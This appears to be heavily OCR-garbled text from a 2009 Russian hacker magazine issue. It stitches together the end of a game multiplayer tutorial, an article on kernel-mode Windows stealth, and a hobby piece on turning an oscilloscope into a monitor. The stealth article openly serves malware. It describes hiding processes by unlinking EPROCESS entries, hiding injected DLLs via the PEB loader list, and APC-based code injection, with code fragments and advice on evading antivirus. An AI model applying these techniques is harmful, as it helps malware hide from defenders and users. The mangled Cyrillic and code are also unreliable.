которая после получения ір с помощью функции тпСоппесІ: 
пытается подключиться ксерверу. Функции тпСоппесІ: 
передаются шесть параметров: ір-адрес сервера, ожидаю- 
щего подключения по іср; номер открытого Еср порта на этом 
сервере; ір-адрес сервера, ожидающего подключения 
по иб р ; номер открытого ибр порта на этом сервере; время 
ожидания (в секундах) ответа от сервера; количество по- 
токов (этот параметр аналогичен одноименному в функции 
тпЗФгіЗегѵеги рассмотрен выше). В случаеуспеха под- 
ключения данная функция возвращает 1 , 0 — по истечении 
времени ожидания и -1 — в случае ошибки. Анализируя воз- 
вращаемоезначение, наша функция такеСоппесі выводит 
диагностические данные. Несмотря нато, что для Іср- и ибр- 
подключений ір-адреса передаются в разных параметрах, 
МікеЫеІ; не может работать с двумя разными серверами, 
поэтому необходимо указывать ір-адрес одного итого же 
сервера. Послеудачного соединения загружается игра. 
Замечу, что в любом из меню всегда есть возможность по- 
кинутьего, вернувшись в начальное. Такое взаимодействие 
между функциями осуществимо благодаря возвращению 
(почти) каждой функцией булевского значения: успешно 
или нет выполнена та или иная операция. Во время за- 
грузки многопользовательской игры происходиттакая же 
инициализация, что и при одиночной. Так как главными 
действующими лицами являются роботы, их класс должен 
содержать переменную-член — идентификатор мульти пле- 
ерной игры. Это сделано в связи с простыми рассуждения- 
ми: если роботжив, он в онлайне (клиентв онлайне), а если 
убит, тогда в отключке. Еще одна переменная, добавленная 
в класс роботов — это спитЬег, которая хранит номер кли- 
ента в порядке подключения ксерверу. В связи стем, что эти 
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и другие переменные закрыты, в класс также 
добавлены функции, изменяющие и воз- 
вращающие значения этих переменных. 
Кратко их рассмотрим: функции ЗеШигтіЬег 
и ОеІІЧитЬег соответственно уста на вли- 
ваюти возвращают значение переменной 
спитЬег, ЗеШІеСоипІ: и СеіІЛюСоипІ: 
устанавливают и возвращают количество 
жизней. 0е1;ѴѴі пСои пі: возвращает коли- 
чество набранных фра гов, а ЕегоѴѴіпСоипІ: 
обнуляетэту переменную. И последняя пара: 
ЗеШиІТірІауегМосІе и ОеМиІТірІауегМосІе, 
соответственно, устанавливают и возвраща- 
ют режим игры (для переменной-члена ро- 
бота]. Что еще касается файла НоЬоЕ срр, — 
конструктор и деструктор робота претерпели 
небольшие изменения: роботы-враги рожда- 
ются невидимыми и неактивными. Деструк- 
тор проверяет — если уничтожается робот 
главного персонажа, то клиент отключается 
от сервера (с помощью функции тпЕіпізЬ, 
не имеющей параметров]. Стоит заметить, 
что именно в функции-члене класса роботов 
Иіе увеличивается счетчик фра го в. Для этого 
осуществляется проверка, кем былубиттот 
или иной оппонент, и, если убийца — это 
главный персонаж, ему добавляется 1 фраг. 
Подсчеты ведутся для каждого клиента от- 
дельно, но благодаря статистике, которую 
ведет сервер, данные синхронизируются. 



Вернемся в Маіп. срр. Кроме всего прочего, 
теперь, при создании главного робота, его 
местоположение выбирается случайным об- 
разом. И хотя враги создаются с заданными 
поумолчанию координатами, после подклю- 
чения очередного клиента и создания его ро- 
бота (на его машине] один из врагов (первый 
неактивный] активизируется и входит в игру 
с координатами робота-оппонента. 

Ниже по коду мы попадаем в основной цикл, 
где вместо взаимодействия с объектами 
сначала идут сетевые работы, то есть про- 
верки на приходящие пакеты разныхтипов. 
Но сетевые работы производятся только 
в том случае, если у главперсонажа включен 
мультиплеерный режим (читай выше]. 
Поскольку пакеты с да иными о появлении 
нового, а также с данными об уходе старого 
клиента передаются с сервера по Іср, значит, 
его мы и должны прослушивать. Функция 
тпНесѵТСР проверяет входящий Іср-поток. 

У нее есть лишь один параметр, который 
для клиентской стороны не имеет значения, 
поэтому равен І\ІІЛ_І_. Если входящих пакетов 
не обнаружилось, то функция возвращает О, 
а если один или несколько пакетов есть, тог- 
да она возвращает число больше 0 (= числу 
пакетов, стоящих в очередь на обработку]. 
Рассмотрим сценарий, по которому пакет 
пришел. Из него извлекаются два значения: 



номера операции и клиента. Затем прове- 
ряется, какая это операция: Іср-операций 
всего две (смотри начало абзаца). Если опе- 
рация — «Новый клиент», то в цикле ищется 
неактивный робот. В случае нахождения 
он становится активным и привязывается 
под управление от вновь подключившегося 
клиента. Если же операция — «Клиентушел», 
то в цикле снова производится поиск по всем 
вражеским роботам с целью обнаружить 
робота с номером (спитЬег, возвращае- 
мым функцией беІІЧитЬег], равным номеру 
клиента, отправившего сообщение об уходе. 
После того, как номера совпадут, найденный 
вражеский роботуничтожается. 

После проверки Іср проверяется ибр. Опера- 
ций 16 йР тоже два типа: первый — это мани- 
пуляция объектом (роботом] (РозіЕопСІіепІ:), 
а второй — сообщение, представляющее со- 
бой сигнал о победе (ѴѴіп). С обработкой па- 
кета первого типа все более или менее ясно: 
этот фрагмент кода похож на код, рассмот- 
ренный в серверном исходнике, когда дан- 
ные принимались от одного определенного 
клиента и отправлялись остальным. Только 
здесь вместо формирования и отправки 
пакета принятые данные участвуют в мани- 
пуляции надобъектом: перемещение и по- 
ворот с помощью функций Оагк О О К. Тут же 
проверяется, выстрелил ли клиент. На этом 
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выполнение операции и первый условный оператор, относящийся 
к операции РозШопСбепЕ завершаются, и далее идет второе усло- 
вие, которое проверяет отношение операции ко второму типу — ѴѴіп. 
Если сервер действительно отправил пакет исір с такой операцией, 
значит, кто-то набрал нужное количество фрагов. Игра завершена, 
и надо вывести таблицу результатов. Конечно же, мы реализовали 
в и грета кую возможность! Но прежде, после того, как стало ясно, 
что пришел ѵѵіп-пакет, мы должны извлечь из него информацию, 
поскольку в этой посылке содержатся имена всех клиентов вместе 
с численным выражением их ратных подвигов. Для этого в цикле мы 
заполняем массив переменных структурного типа, объявленного 
ранее данными из пакета. Теперь вся итоговая таблица сохранена 
в массиве. Далее удалим из памяти динамические объекты, скроем 
статические и вызовем самописную функцию ІМеЮатеОѵег, которая, 
собственно, обработает масс иве да иными и выведет их на экран 
в виде двух столбцов. 

По завершении условных операторов следует код формирования 
и отправки иф-пакета. С этим мы уже знакомы (для освежения памя- 
ти смотри раздел «Сервер»). 

г ИЗБЕГАЕМ НЕПРИЯТНОСТЕЙ 

У нас остались два нерассмотренных вопроса: 

• Зачем, все-таки, отправлять и изменять (вне геймплея) количе- 
ство жизней? 

• Почему после того, как отправляется пакет с лимитом фрагов, 
переменная-член обнуляется? 

На второй вопрос ответ прост: чтобы сигнал о победе был отправлен 
лишь однажды. А количество жизней отправляется, чтобы син- 
хронизировать клиентов. Объясню подробнее. Например, в битве 
участвуют три робота. У каждого разное количество жизней. Один 
погибает, а когда возвращается в игру, его клиентская часть создает 
динамические объекты заново, добавляя врагов и раздавая им 
по максимуму жизней (хотя в виртуале у них может быть меньше). 
Поэтому, когда он будет стрелять по противникам, они уже помрут, 



а нае го машине — останутся живы, так как жизней -то у них боль- 
ше, чем в реальности. Во избежание этой неприятной ситуации 
клиенты сообщают своим оппонентам, сколько уних жизней в реале, 
и происходит синхронизация между клиентами. В синхронизации, 
по большому счету, и заключается основная трудность разработки 
онлайновых игр. 

Кстати, наконец-то, в игре появилась пауза! Теперь, при нажатии 
Езсаре во время игры, она не завершит свою работу, как можно было 
ожидать. Напротив, перед юзером откроется (снова) консольное 
меню, в котором будет написано, какие клавиши для чего. 
Последнее, на что надо обратить внимание, это изменения в файле 
6ате_0Ьр б. В нем только изменен прототип функции Оіе. Если 
раньше она была чисто виртуальной, поскольку во всех классах- 
потомках использовалась без изменения прототипа, то сейчас 
в классе роботов в деструктор добавился параметр, и поэтому она 
перестала быть чисто виртуальной. 

Мы рассмотрели новый, связанный с мультиплеером код, погрузи- 
лись во все хитросплетения сетевых игр и разработали многополь- 
зовательскую баталию на основе игрового движка ОагкВоЬоЕ Если 
ты прочитал все статьи цикла, то уже знаешь толк в игростроении, 
искусно владеешьтехникой создания компьютерных игр и, вообще, 
являешься светлым джедаем, которому предстоит длинный путь 
к вершине мастерства! Как ты воспользуешься этими знаниями, 
за в и сит только от тебя. Вариантов масса: возможно, ты будешь 
программистом в какой-нибудь крутой фирме и своим талантом 
поможешь российской игровой индустрии, может быть, махнешь 
за океан, чтобы помочь местным: а может быть, откроешь свою 
студию, где будешь проводить исследования в области электронных 
развлечений и разработаешь абсолютно новый игровой жанр! 

^ЗАКЛЮЧЕНИЕ 

В заключение хочу отметить положительные и отрицательные 
стороны использования интерфейсного ПО (тібсИеѵѵаге), к которому, 
в частности, относится йагк 60К. Конечно, автор знаком с за- 
верениями типа: «Зачем мне нужна какая-то надстройка, есть же 
ОігесіХ!». Да, уигетбо и сам в детстве так говорил, но тогда у него 
не было нормального графического акселератора, и он все игры 
писал под ОігесЮгаѵѵ, огрызаясь направо и налево. Сейчасже, 
когда крутые 30-ускорители есть практически у каждого, подобный 
консерватизм будет выглядеть очень странно. Поэтому, воспользо- 
вавшись интерфейсным ПО, которое порой абсолютно бесплатно 
(как в рассматриваемом случае), можно сократить время на разра- 
ботку игрового (в частности, графического) движка, и посвятить его 
вещам творческим: обдумыванию сюжета и проработке геймплея! 
Если тебе захочется еще что-нибудь узнать о разработке игр (в част- 
ности, о кодировании движков), то пиши, уигетбо всегда открыт 
для общения. Удачи тебе во всех начинаниях, игродел ! ІНІ 



ОТ РЕДАКЦИИ 

Предыдущие статьи цикла вышли в номерах □С за октябрь, ноябрь 
и декабрь прошлого года («Темное искусство — игродела», «Игра 
в одни ворота», «Темное искусство игродела, часть 3») . На этом 
мы хотели было завершить цикл «Темное искусство игродела», 
посчитав его несколько унылым, но читатели с нами не согласи- 
лись. Они проспамили мыло редактора рубрики требованиями 
обещанного завершения банкета — статьи про мультиплеер. Мы 
были вынуждены запросить пощады. Приносим свои извинения — 
вот она, эта статья. 
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ИГРА В ПРЯТКИ НАУРОВНЕ ЯДРА 

Процессы в ѴѴіпсІоѵѵз (как и в любой другой ОС) — это наше все. От ядра 
до калькулятора, операционная система представляет собой лишь 
набор процессов. Когда ты дважды кликаешь на значок какой-нибудь 
программки, чтобы запустить ее, в недрах системы приводятся в дей- 
ствие огромные ресурсы, выделяется память, вызываются десятки 
ЫаІіѵеАРІ... И сегодня мы поговорим отом, какэффективно исполь- 
зовать эти ресурсы в решении нетривиальных задач при работе с про- 
цессами на уровне ядра ѴѴіпсІоѵѵз. 



+ + + + 



+ + + + 



г ПРОЦЕССЫ В ѴѴІЫ00ѴѴ5 

С некоторой натяжкой процессом в ѴѴіпсІоѵѵз 
можно назвать набор байт в оперативной 
памяти. Это если в целом. А в частности — про- 
цессом обычно называютэкземпляр прог- 
раммы, загруженной в оперативную память и 
выполняемой ѴѴіпсІоѵѵз. 



Любой процесс состоит ИЗ: 

• структур данных, содержащих всю информа- 
цию о процессе, втом числе, списокоткрытых 
дескрипторов различных системных ресурсов, 
уникальный идентификатор процесса, различ- 
ную статистическую информацию и т.д. ; 

• адресного пространства — диапазона 



адресов виртуальной памяти, которым может 
пользоваться процесс (4 0В, если помнишь); 

• исполняемого кода и данных, которые 
проецируются в виртуальное адресное про- 
странство процесса. 

Мало-мальски опытный кодер знает, что соз- 
дание ѴѴіп32 процесса осуществляется 
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УТИЛИТА РЕ-Т00І-5 ПОКАЖЕТ ОН, ЗАГРУЖЕННЫЕ В ПРОЦЕСС 



вызовом одной изтаких функций, какСгеаіеРгосезз, 
СгеаіеРгосеззАзІІзег (для ѴѴіп ІЧТ/2000] и 
СгеаІеРгосеззѴѴііЫодопѴѴ (начиная с ѴѴіп2000] и т.д. Но 
все это касается только юзермода. Если посмотреть на 
создание процесса на уровне ядра, то волосы начнут шеве- 



ИСПОЛЬЗОВАНИЕ 
АРС ДЛЯ 
ИНЖЕКТАКОДА 

рМсІІ = ІоАІІосаЬеМсІІ (рРауІоасІВиі: , 
бмВиНЗіге, РАЬЗЕ, РАЬЗЕ, ШЬЬ) ; 
МтРгоЪеАпсІЬоскРадез (рМсІІ, КегпеІМосІе, 
ІоМгіЬеАссезз) ; 

КеЗЬаскАЬЬасЬРгосезз (рТагдеЬРгосезз , 
&АрсЗЬаЬе) ; 

МарресІАскігезз = 

МіпМарЬоскесІРадезЗресіНуСаске (рМсІІ , 

ЬзегМосіе , МтСасЪей, ШЬЬ, РАЬЗЕ, 
ШгтаІРадеРгіогіЬу ) ; 

КеЬпзЬаскЬеЬасЬРгосезз (&АрсЗЬаЬе) ; 
КеІпіЬіаІігеЕѵепЬ (рЕѵепЬ , 

ШЬіНісаЬіопЕѵепЬ , РАЬЗЕ); 

КеІпіЬіаІігеАрс (рАрс , рТагдеЬТЬгеасІ, 
ОгідіпаІАрсЕпѵігоптепЬ , &МуКегпеІКоиЬіпе , 
ШЬЬ, МарресІАсІсІгезз , ЬзегМосіе, ( РѴОІЬ) ШЬЬ) ; 
КеІпзегЬОиеиеАрс (рАрс , рЕѵепЬ , ШЬЬ, 0); 



литься оттого количества ресурсов и системных вызовов, 
которые ОС задействует при создании нового процесса! 

За подробностями отсылаю тебя к книге М. Руссиновича 
и Д. Соломона «Внутреннее устройство ѴѴіпбоѵѵз», хотя, по 
правде, с программистской точки зрения она мало что даст. 
Поэтому, если тебя заинтересует программный процесс 
создания и запуска процесса из ядра, пиши мне на мыло, 
обсудим. 

Что же может дать честному хакеру доступ кадресному 
пространству процесса? Да все что угодно! От изменения 
данных процесса и манипулирования его окружением, 
вплоть до запуска своего зловредного (или не очень] кода 
в чужом адресном пространстве. 

Получить доступ кадресному пространству чужого процес- 
са можно, все эти способы хорошо документированы. Одно 
плохо — они довольно эффективно палятся проактивками 
и специальными утилитами. Что делать? Лезть в нулевое 
кольцо! Уж там -то нам никакой N00 или Касперский пере- 
чить не будет! 

в СОКРЫТИЕ ПРОЦЕССА 

Была раньше та кая фича — заказчики мал вари, следуя 
моднымтенденциям, требовали отпрограммиста «шоб в 
процессах не видна была». Это и сейчас довольно распро- 
страненный хакерский прием, нацеленный на сокрытие 
от бдительных глаз процесса трояна (руткита, вируса и 
пр.]. Оговорюсь сразу, что способа, гарантирующего 100% 
невидимость процесса для различныхутилит, антивирей и 
проактивных защит, не существует. Скрытый процесс мож- 
но выявить всегда. Как? Подробности можешь почитать на 
ѵѵѵѵѵѵ.ѵѵазпп.ги 

Для скрытия процессов в ІІзег Мобе обычно используется 
технология внедрения своего кода в чужие процессы и 
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• Для лучшего 
усвоения материала 
советую статьи (на 
английском): 

«ѴѴЬа* Ооез Оп Іпзібе 
ѴѴіпсІоѵѵз 2000: 

Боіѵіпд *Ье Музіегіез 
оМЬе Боасіег» (на 
М50ІЧ), «ТЬгее ѴѴауз 
Іо Ігцесі Ѵоиг Собе 
іп*о АпоіЬег Ргосезз» 
( уууууу.соберго]есЬ 
сотЛбгеабз/ѵѵіпзру. 
азр ) и «йіі Ігцесііоп» 
( ѵѵѵѵѵѵ.собеЬгеакегз- 
щигпаЕсот/сопіюпІ:/ 
ѵіеѵѵ/1 27/97 ). 
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• В ядре ѴѴі псіоѵѵ5 
от билда к билду во 
многих системных 
структурах меняются 
смещения. Всегда 
держи под рукой 
прогутипа РбЬОитр, 
которая поможеттебе 
находить необходи- 
мые смещения. 



перехвата функции 2\л/Эиегу5узІеітіІп&эгппабоп[5у5ІеппРгос 
еззезАпбТНгеабзІпІогтаПюп , ...] из пісШ.сШ. Оно сплайсит- 
ся и из полученного списка убирается интересующий нас 
процесс. 

Впрочем, не будем углубляться в данную тему, а поговорим 
отом, какскрыть процесс, находясь в ядре ѴѴіпбоѵѵз. Сплай- 
сить ничего не будем, поскольку это оченьлегко выявить. 
Мы пойдем другим путем. Техника не нова, но достаточно 
эффективна. 

Каждый процесс в ОС ѴѴіпбоѵѵз представлен структурой 
ЕРР0СЕ55. Кроме атрибутов процесса, она ссылается на 
несколько других структур, связанных с выполняющимся 
процессом. Например, с каждым процессом связан один 
или несколько потоков, представленных в системе струк- 
турой ЕТНВЕАО. Структуры ЕРР0СЕ55, в свою очередь, 
связаны в круговой двусвязный список — то есть, прошу 
прощения за тавтологию, в каждой такой структуре при- 
сутствует указатель на иЗТ_ЕЫТРУ, содержащий указатели 
на предыдущую и последующую структуры. Наша цель — 
найти текущий ЕРП0СЕ55, пробежаться по всему списку, 
найти процесс, который надо скрыть, после чего слин- 
ковать предыдущий и последующий процессы. При этом 
обязательно надо помнитьотом, что в ѴѴіпбоѵѵз отбилда к 
билду меняется «состав» недокументированных структур и, 
соответственно, смещения на нужные нам поля. 

Первое, что нужно сделать, это получитьуказатель на 
структуру ЕРР0СЕ55. Это делается вызовом функции 
РзбеЮиггепіРгосеззО: 



ЕРЕОСЕЗЗ 



КРР0СЕ53 



г. ■ ■ 

РЕРКОСЕЗЗ еРЕОС = РзСеССиггепСРгосезз ( ) . 

Не будем сейчас разбирать, какименно она действует — 
если интересно, покопайся в отладчике. Вызовом 2ѵѵ0иег 
у 5у зі: е ітН п ію г іті а б о п ( 5у зі: е пп Р го се 55 е з А п б Т Ь ге а б з I п ію г пп а 1: 
іоп, ...] находим нужный нам процесс из общего списка (по 
РЮ’у процесса или по его имени). Затем немного поколдуем 
с двусвязными списками из структуры ЕРВ0СЕ55 и... вуаля! 
запущенный процесс исчезает из менеджера задач. 

Вот, в принципе, и все. Драйвер, реализующий сокрытие 
процесса из менеджера задач, ищи на диске. 

в СОКРЫТИЕ 
ЗАГРУЖЕННОЙ 
В ПРОЦЕСС ОІ_І_ 

Часто малварь поставляется конечному юзеру не как 
отдельный ехе-шник (поскольку его легко отловить), а 
как отдельная библиотека 611, подгруженная в адресное 
пространство какого-нибудь процесса. А что, совсем не- 
дурно: отдельного процесса нет, а искать подгруженную 
би в адресном пространстве другого процесса — задача 
трудоемкая. Этот нехитрый хакерский прием заключается 
в том, чтобы записать в память чужого процесса свой код 
через вызов ѴігіиаІАиосЕх/ѴѴгііеРгосеззМетогу и затем 
выполнить его посредством СгеаіеПетоіеТЬгеаб. 

Впрочем, справедливости ради скажу, что трюк палится 
анти в прям и. Попробуем немного осложнить им жизнь — 
скроем нашу зловредную 611 из списка загруженных в АП 




+ + + 



+ + + 



+ + + 



+ + + 



+ + + 



+ + + 



+ + + 



+ + + 



БЛОКНОТ ЗАПУЩЕН, НО В СПИСКАХ ПРОЦЕССА НЕТ 
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процесса. Какты помнишь, в ядре ѴѴіпбоѵѵз для работы с 
процессами используется целая куча структур. Одна из 
самых важных — это «Блок переменных окружения про- 
цесса» (Ргосезз Епѵігоптепі: Віоск, РЕВ). Блок представ- 
ляет собой недокументированную и критически важную 
для нормального функционирования процесса структуру, 
которая создается и заполняется на стадии создания про- 
цесса. К примеру, в ней содержатся такие важные поля, 
как РЕВ_БРВ_РАТА или РР0СЕ55_РАРАМЕТЕР5. А вот 
уже в РЕВ_БРР_РАТА содержится список библиотек, за- 
груженных в адресное пространство процесса. Он-то нам 
и нужен! Получив указатель на РЕВ, мы заимеем указатель 
на двусвязный список б И, загруженных в процесс: РеЬ 
-> БоабегРаіа -> ІпБоабОгбегМобиІеЕізГ Теперь, чтобы 
спрятать би от всяческихутилит, просто поступим так 
же, как и в случае сокрытия процесса из списка задач — 
слинкуем соседние указатели в ІпБоабОгбегМобііІеизІ:. 
Итак, добываем указатель на РЕВ текущего процесса в 
ІІзегтобе: 

РЕВ* СеСРЕВО 
{ 

РЕВ* рРеЪ; 

азт { 

ризЬ Рз : [0x30] 
рор рРеЬ 

} 

геСигп рРеЪ; 

} 

Также можно вызвать функцию ^ѵѵОиегуІпіютпабопРгосезз 
с классом информации РгосеззВазісІпіюгппаиоп. В этом 
случае в буфер запишется структура РР0СЕ55_ВА5ІС_ 

I N РОРМАТІОЫ , одно из полей которой и естьуказатель на 
РЕВ. Замечу, что адреса РЕВ для всех процессов анало- 
гичны, болеетого, РЕВ всегда находится в виртуальном 
адресном пространстве процесса по адресу 0х7РРБ Р000. 

В ядре получить указатель на РЕВ можно следующим об- 
разом: 

РЕРК.ОСЕ83 еРгосезз = РзСеРСиггепРРгосезз ( ) ; 
рРеЬ = (РѴОІБ) (* (РІІЫЖС) ( ( РСНАК) еРгосезз + 
РеЪОРРзеР) ) . 

Вотеще одно нехитрое решение. Чтобы защитить про- 
цесс от попытки найти там скрытую 611, сделаем перехват 
функции І\иРеабѴіг1:иаІМеппогу. Затем точно также найдем 
список загруженных библиотек, исключим нашубіі-ку и воз- 
вратим управление вызвавшему коду. Так, путем манипуля- 
ций с РЕВ’ом можно осуществить защиту внедренной бііот 
чтения. Оба примера, реализованных на С, ищи на диске. 
Техника сокрытия 611, которую мы только что рассмотрели, 
не является чем-то принципиально новым, и ты легко смо- 
жешьс ней разобраться. Но это только начало. Следующим 
этапом будеттехника подмены самого РЕВ, когда путем 
такихже манипуляций в таргет-процесс осуществляется 
подгрузка фейковой б II вместо какой-нибудьзаконопос- 
лушной изег32.бИ. Но об этом в другой раз. 

в ИНЖЕКТ КОДА 

А теперь — о самом интересном. Нам необходимо ис- 
полнить свой не очень добропорядочный код в контексте 



доброго и хорошего процесса. То бишь, выполнить инжект 
кода — из ядра и не привлекая внимания бдительных про- 
активок. 

Для новичков, возможно, это будет непросто, но, если 
у тебя есть опыт программирования в ядре, трудностей 
тут н ет. 

Механизм ОС ѴѴіпбоѵѵз предусматривает АРС — 
АзупсЬгопоиз Ргосебиге Саіі — что-то типа «сообще- 
ний», которые могут доставляться потоку для выполне- 
ния определенных функций, причем поток о них может 
ничего не знать. Их-то мы и задействуем. Доставляющий 
код определяет свою саІІЬаск-функцию для АРС, которая 
будет выполнена в контексте требуемого потока. На- 
пример, механизм АРС используется в таком важном 
механизме потоков ѴѴіпбоѵѵз, как приостановка и восста- 
новление (зизрепб/гезите) потока. Главное преиму- 
щество АРС сточки зрения малвари —то, что АРС для 
анти в и рей и практивок — это совершенно нормальная 
операция, выполняемая ОС, и поэтому соотнести вызов 
АРС со зловредными действиями малвари ей будет 
крайне трудно. Более подробно (правда, на английском) 
о вызове АРС можно почитать здесь: ЬНрУ/ѵѵѵѵѵѵ.сппкгпІ. 
сот/а гс-изегарс.ЫтІ 

Итак, первое: выделяем кусок памяти в виде М0\_, который 
затем будем использовать для записи нужного нам кода. 
Затем аттачимся к та ргет- процессу, после чего л очи м в 
юзермодной памяти выделенный нам участок памяти. 
Отключаемся от процесса и вызываем проинициализиро- 
ванный АРС, который будет выполнен системой в контексте 
одного та ргет- процесса. 

Здесь нужно предусмотреть поток Та гдеГГЬгеаб, где будет 
выполняться код. Обычно при решении этой проблемы 
находится существующий поток в процессе вызовом 
РКТЫКЕАБ Д]ігеа<і=Ке0еССиггепЦТигеас1 ( ) . 

В дополнение к вышесказанному могу сказать, что, при- 
аттачившись к какому-либо процессу, кроме инжекта кода, 
можно без особых проблем считывать нужные данные че- 
рез вызов І\иВеабѴі1:иаІМетогу или же производитьзапись 
в адресное пространство процесса соответственности 
через ЫіѴѴгіІеѴігІиаІМеппогу. К примеру, что-нибудь вроде: 




> ЙУЙ 

• На дискеты 
найдешь драйвер, 
реализующий сокры- 
тие процесса, а также 
несколько других 
фич, описанных 
в статье и предназна- 
ченныхдля изучения 
процессов. 




• Для отладки драй- 
веров обязательно 
нужен отладчик 
ядерного уровня типа 
ЗоПІСЕ или ѴѴіпОВб. 
И не забудь скачать 
символы с ѵѵѵууА 
тісгозои. 
сот/ѵѵЬбс/ 
РеѵТооІз/РеЬиддіпд/ 
зутЬоІркд.тзрх . 



СЕЗЗ 



РЕРК.ОСЕ88 ргосезз = РзСеРСиггепРРгосезз ( ) ; СЕЗЗ 
КеАРРасЬРгосезз (ргосезз) ; 

ЫШгіРеѴігРиаІМетогу (ргосезз_Ьап<б1е , 
асМгезз, ЪиРРег, питЪуРез, ШЬЬ) ; 



} 

КеБеРасЬРгосезз ( ) ; 



Незабудь проверить, имеетли секция, куда хочешь произ- 
вести запись, аттрибут«ѵѵгіІеаЫе», иначе попытка записи 
в поп -ѵѵгіІеаЫе участок памяти приведет к ВЗОР’у. Таковой 
поумолчанию является секция кода, но проблема решается 
легко — нужной секции просто присваивается аттрибутдля 
записи. 

«Так почему именно гіпдО, ведьтотже самый инжект 
кода можно успешно сделать и в юзермоде?»,— можешь 
спроситьты. Откроютайну — кодингв нулевом кольце не 
так страшен, как может показаться на первый взгляд и, 
вмешиваясь в работу ядра своими руками, ты начнешь 
чувствовать себя «повелителем машин». Шутка. Если есть 
вопросы, пиши, обсудим! ЗИ 



ЕГЧТЕѴ{ 
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ВАДИМ «ООСТОН Ѵ_М_Е_І\І» ДАНЬШИН 

/ ѵирік_ѵивок2гамАіі..ви / 










Обуздай его по-фрикерски 

Пришел домой с учебы и тут на тебе — сгорел последний рабочий мо- 
нитор! Хотел, было, пойти за новым, но на дворе кризис. Денег ни фига 
нет. И тут мой взгляд упал на осциллограф. «Не беда, — подумал я. — 
Сейчас соберу монитор из того, что есть под рукой. 

Азаодно выйду победителем изтрудной ситуации». 



Днем я договорился с друзьями, что мы устроим вечером неболь- 
шой домашний турнир по ОиакеЗ Агепа. Врубаю комп, а из монитора 
валит дым! Оказывается, всему виной — вода с потолка, которую я 
по запарке не заметил. И тут, как назло, приходят гости (с ноутами]. 
Недолго думая, я усадил их и раздал доступ в домашний ѴѴі-Рі, Затем 
я полез под стол. В полутьме, освещая путь мобилой, я нашел давно 
не использовавшийся осциллограф, вытащил его, протер от пыли и 
включил в сеть — ррработает! И — через буквально полчаса ковыря- 
ния — готов новый монитор. В шоке товарищи смотрели на зеленый 
экран осциллографа, на котором совершенно точно узнавалось меню 
любимой сетевой га мы. Ну и тут я, собственно, предложил начинать. 

в ИЩЕМ НУЖНЫЕ ЖЕЛЕЗКИ 

Понимая, что осциллограф — это недоделанный телевизор для 
измерительных целей, я стал, пока чисто теоретически, подгонять его 
возможности под свои потребности. Там же, под столом, мне попался 
в полутьме импульсный блок питания и неплохой генератор функций. 
Затем я метнулся в другой угол комнаты (попутно хорошенько навер- 
нувшись на растяжках из проводов) — к ящику с барахлом, оставшим- 
ся от былых опытов. Судорожно я хватал нужные мне девайсы: па- 
яльник, флюс, припой, пинцет, плату от горелого монитора, убитый 
с одного конца ѴСА-кабель, старую видеокарту для проб. Кабель, 
пожалуй, я зря так резко выдернул с верхней полки шифанера, потому 
что в следующую секунду весь хлам рухнул мне на голову. Снизу стали 
доноситься вопросы типа «А у тебя там все в порядке?» и «Ты там 
живой вообще?». Мелочи, подумал я. Время идет, ав ре мяв да иной 
ситуации — это самое ценное. Перешагивая через бухты проводов, 
я свободной конечностью прихватил свой любимый тестер, которым 
задумал прозвонить найденный кабель на работоспособность. В гру- 
де мусора нашелся распечатанный даташит на древнюю видеокарту 
(ІЧѴЮІА тх400). Никогда бы он не завладел моим вниманием, если бы 
не драгоценная распиновка Ѵ6 А- гнезда. Л ист бумаги и изолента, спа- 
сающая мир, были уже на столе. Пришла пора собраться с мыслями. 



в ПОЗНАЙ ТЕОРИЮ 

Спроси себя, а знаешь ли ты все функции и возможности осциллог- 
рафа и лучевой трубки? Если ответ — восторженное «Да!», то можешь 
пропустить этот раздел и пойти допаивать личного киборга -тел охра- 
нителя. 

Прежде всего, осциллограф — это почти то же, что и вольтметр, стем 
отличием, что он умеет рисовать значение напряжения по времени. С 
его помощью ты можешь посмотреть не только, что твой ток в розетке 
живет по синусоидальным законам, но и различные мелочи типа на- 
водок, низковольтных сигналов высокой частоты и пр. Это незамени- 
мый девайс, которым должен владеть любой, кто так или иначе будет 
иметь дело с электроникой. 

Вообще, осциллографы подразделяются на два вида: аналоговые и 
цифровые. Но вначале ты совсем не заметишь разницы, и тебе будет 
пофигу, чем пользоваться. Различаются они размерами, чувствитель- 
ностью, функционалом, ценами. Как правило, первый осциллограф в 
жизни электронщика появляется либо прямиком со свалки, либо по 
списанию из какого-нибудь вуза. 

В нашем сегодняшнем изврате речь пойдет об аналоговых осциллог- 
рафах, а потому рассмотрим принципы их работы и управления. Внут- 
ри осциллографа есть кинескоп — такая длинная стеклянная трубка 
с пластинами и специальным светящимся покрытием на экране — и 
электроника, управляющая развертками, переключением режимов 
работы и пр. Но начнем мы слицевой панельки: на ней обязательно 
есть гнезда подключения щупа или специального провода с двумя 
зажимами, которым ты судорожно тыкаешь по плате, дабы замерить 
и вывести на экран протекающие по схеме напряжения. Эти гнезда 
называют «канала ми». Обычно их маркируют на советских осциллог- 
рафах как «канал А», «канал Б», или же на импортных — как«СН 1 », 
«СН2». Каналов у осциллографа может быть от 1 до 5. Считается, что, 
чем их больше, тем удобнее осциль в эксплуатации, но мне лично 
всегда хватало 2-канального. Естьтакже гнезда синхронизации, 
выхода, входа и земля, но о них будет подробнее рассказано ниже. 



► 110 



ХАКЕР 05 /125/ 09 






рЬгеакіпд 
















ВОТТАК МЫ СЛУШАЕМ ПЛЕЕР 



ВВЕРХУ У МЕНЯ СТОИТ ГЕНЕРАТОР ФУНКЦИИ, НУ А 
ВНИЗУ РАЗМЕСТИЛСЯ ГЕРОЙ ДНЯ — МОЙ ОСЦИЛЬ 
ИЗ-ПОД СТОЛА 





ВИЗУАЛИЗАЦИЯ ПЛЕЕРА АІМР В ОРИГИНАЛЕ И НА 
ЭКРАНЕ ОСЦИЛЛОГРАФА 



Теперь поговорим о режимах работы осциллографа — их много, но 
выделим несколько основных, которые мы сегодня будем использо- 
вать и комбинировать между собой. Сначала по говорим о нормаль- 
ном режиме работы этого агрегата — режиме прямого отображения 
подаваемого в канал сигнала. Если ты сигнал не подаешь, то на 
экране можно наблюдать ровную линию. Но стоит тебе подать ток 
от пальчиковой батарейки, прямая поднимется выше или ниже, в 
зависимости оттого, какими контактами ты подключил осциль к 
батарейке. Если ты ничего не заметил на экране, значит, читай про 
крутилку «вольтаж». Эта небольшая ручка устанавливает, какое на- 
пряжение соответствует одной клеточке на экране. Если установишь 
ее в положение IV, то при высоте экрана в 1 0 клеток, сможешь видеть 
напряжения от -5 до + 5 вольт. Если ты не видишь вообще никаких 
линий, вполне возможно, они уходят за границы экрана. Это тебе 
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-V ПЛАНЫ -V 



